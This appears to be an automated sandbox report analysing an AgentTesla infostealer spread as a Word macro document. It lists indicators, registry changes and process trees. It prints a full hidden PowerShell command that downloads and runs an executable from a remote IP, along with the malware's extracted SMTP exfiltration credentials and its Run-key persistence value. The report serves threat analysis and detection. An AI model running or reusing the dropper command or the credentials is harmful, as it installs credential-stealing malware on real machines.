agenttesla | ce54e81125eb44ed53dec51f69f439d692ec3fcbfa99be82886163b5c869e74b

Analysis

max time kernel
298s
max time network
146s
platform
windows7_x64
resource
win7-en-20210920
submitted
27-09-2021 00:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW PRODUCT DETAILS.doc
Size

241KB
MD5

7098066eab8807aa361fa1f0fdff57ca
SHA1

d6534ac36458aafd6b4b52e6716903786fb6241a
SHA256

ce54e81125eb44ed53dec51f69f439d692ec3fcbfa99be82886163b5c869e74b
SHA512

9381147f59475aaf7d7a5cb4cd94371c337b22c85eea643ad9483f49210efd313a2c503701d6fd980a56d00cc95a2922af99312116adee195f75d5ce1ce999e6

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://162.245.190.59/hit/kik.exe

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.owerbi.club
Port:
587
Username:
[email protected]
Password:
UCI1f;h9E?I9

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	372	1620	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1912	1620	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1896	1620	powershell.exe	WINWORD.EXE

AgentTesla Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1824-70-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/1824-71-0x000000000043774E-mapping.dmp	family_agenttesla
behavioral1/memory/1824-73-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/1896-96-0x00000000023E0000-0x000000000302A000-memory.dmp	family_agenttesla
behavioral1/memory/560-114-0x000000000043774E-mapping.dmp	family_agenttesla
behavioral1/memory/1220-120-0x000000000043774E-mapping.dmp	family_agenttesla
behavioral1/memory/576-130-0x0000000000800000-0x0000000000860000-memory.dmp	family_agenttesla

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 372 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

kik.exekik.exekik.exekik.exekik.exekik.exekik.exe

pid process

1504 kik.exe
1824 kik.exe
1984 kik.exe
808 kik.exe
1836 kik.exe
560 kik.exe
1220 kik.exe

flow	pid	process
4	372	powershell.exe

Loads dropped DLL 11 IoCs

Processes:

powershell.exeWerFault.exeWerFault.exe

pid	process
372	powershell.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

kik.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\winfiles = "C:\\Users\\Admin\\AppData\\Roaming\\winfiles\\winfiles.exe"	kik.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 39 IoCs

Processes:

kik.exekik.exekik.exe

pid	process
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
1984	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

kik.exekik.exekik.exe

description	pid	process	target process
PID 1504 set thread context of 1824	1504	kik.exe	kik.exe
PID 1984 set thread context of 560	1984	kik.exe	kik.exe
PID 808 set thread context of 1220	808	kik.exe	kik.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

620 1504 WerFault.exe kik.exe
576 1984 WerFault.exe kik.exe
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	pid_target	process	target process
620	1504	WerFault.exe	kik.exe
576	1984	WerFault.exe	kik.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1620 WINWORD.EXE

pid	process
1620	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

powershell.exekik.exekik.exeWerFault.exepowershell.exepowershell.exekik.exekik.exekik.exeWerFault.exe

pid	process
372	powershell.exe
372	powershell.exe
372	powershell.exe
1504	kik.exe
1504	kik.exe
1504	kik.exe
1824	kik.exe
1824	kik.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
620	WerFault.exe
1912	powershell.exe
1896	powershell.exe
1912	powershell.exe
1912	powershell.exe
1896	powershell.exe
1896	powershell.exe
1984	kik.exe
808	kik.exe
808	kik.exe
808	kik.exe
1984	kik.exe
1984	kik.exe
808	kik.exe
808	kik.exe
1220	kik.exe
1220	kik.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe
576	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid process

620 WerFault.exe
576 WerFault.exe

pid	process
620	WerFault.exe
576	WerFault.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exekik.exekik.exeWerFault.exepowershell.exepowershell.exekik.exekik.exekik.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	1504	kik.exe
Token: SeDebugPrivilege	1824	kik.exe
Token: SeDebugPrivilege	620	WerFault.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	1984	kik.exe
Token: SeDebugPrivilege	808	kik.exe
Token: SeDebugPrivilege	1220	kik.exe
Token: SeDebugPrivilege	576	WerFault.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXEkik.exe

pid process

1620 WINWORD.EXE
1620 WINWORD.EXE
1620 WINWORD.EXE
1620 WINWORD.EXE
1220 kik.exe

pid	process
1620	WINWORD.EXE
1620	WINWORD.EXE
1620	WINWORD.EXE
1620	WINWORD.EXE
1220	kik.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exekik.exepowershell.exepowershell.exekik.exekik.exe

description	pid	process	target process
PID 1620 wrote to memory of 372	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 372	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 372	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 372	1620	WINWORD.EXE	powershell.exe
PID 372 wrote to memory of 1504	372	powershell.exe	kik.exe
PID 372 wrote to memory of 1504	372	powershell.exe	kik.exe
PID 372 wrote to memory of 1504	372	powershell.exe	kik.exe
PID 372 wrote to memory of 1504	372	powershell.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 1824	1504	kik.exe	kik.exe
PID 1504 wrote to memory of 620	1504	kik.exe	WerFault.exe
PID 1504 wrote to memory of 620	1504	kik.exe	WerFault.exe
PID 1504 wrote to memory of 620	1504	kik.exe	WerFault.exe
PID 1504 wrote to memory of 620	1504	kik.exe	WerFault.exe
PID 1620 wrote to memory of 1912	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1912	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1912	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1912	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1896	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1896	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1896	1620	WINWORD.EXE	powershell.exe
PID 1620 wrote to memory of 1896	1620	WINWORD.EXE	powershell.exe
PID 1912 wrote to memory of 1984	1912	powershell.exe	kik.exe
PID 1912 wrote to memory of 1984	1912	powershell.exe	kik.exe
PID 1912 wrote to memory of 1984	1912	powershell.exe	kik.exe
PID 1912 wrote to memory of 1984	1912	powershell.exe	kik.exe
PID 1896 wrote to memory of 808	1896	powershell.exe	kik.exe
PID 1896 wrote to memory of 808	1896	powershell.exe	kik.exe
PID 1896 wrote to memory of 808	1896	powershell.exe	kik.exe
PID 1896 wrote to memory of 808	1896	powershell.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 1984 wrote to memory of 560	1984	kik.exe	kik.exe
PID 808 wrote to memory of 1836	808	kik.exe	kik.exe
PID 808 wrote to memory of 1836	808	kik.exe	kik.exe
PID 808 wrote to memory of 1836	808	kik.exe	kik.exe
PID 808 wrote to memory of 1836	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 808 wrote to memory of 1220	808	kik.exe	kik.exe
PID 1984 wrote to memory of 576	1984	kik.exe	WerFault.exe
PID 1984 wrote to memory of 576	1984	kik.exe	WerFault.exe
PID 1984 wrote to memory of 576	1984	kik.exe	WerFault.exe
PID 1984 wrote to memory of 576	1984	kik.exe	WerFault.exe
PID 1620 wrote to memory of 1972	1620	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\NEW PRODUCT DETAILS.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Users\Admin\AppData\Roaming\kik.exe
    "C:\Users\Admin\AppData\Roaming\kik.exe"
    3⤵
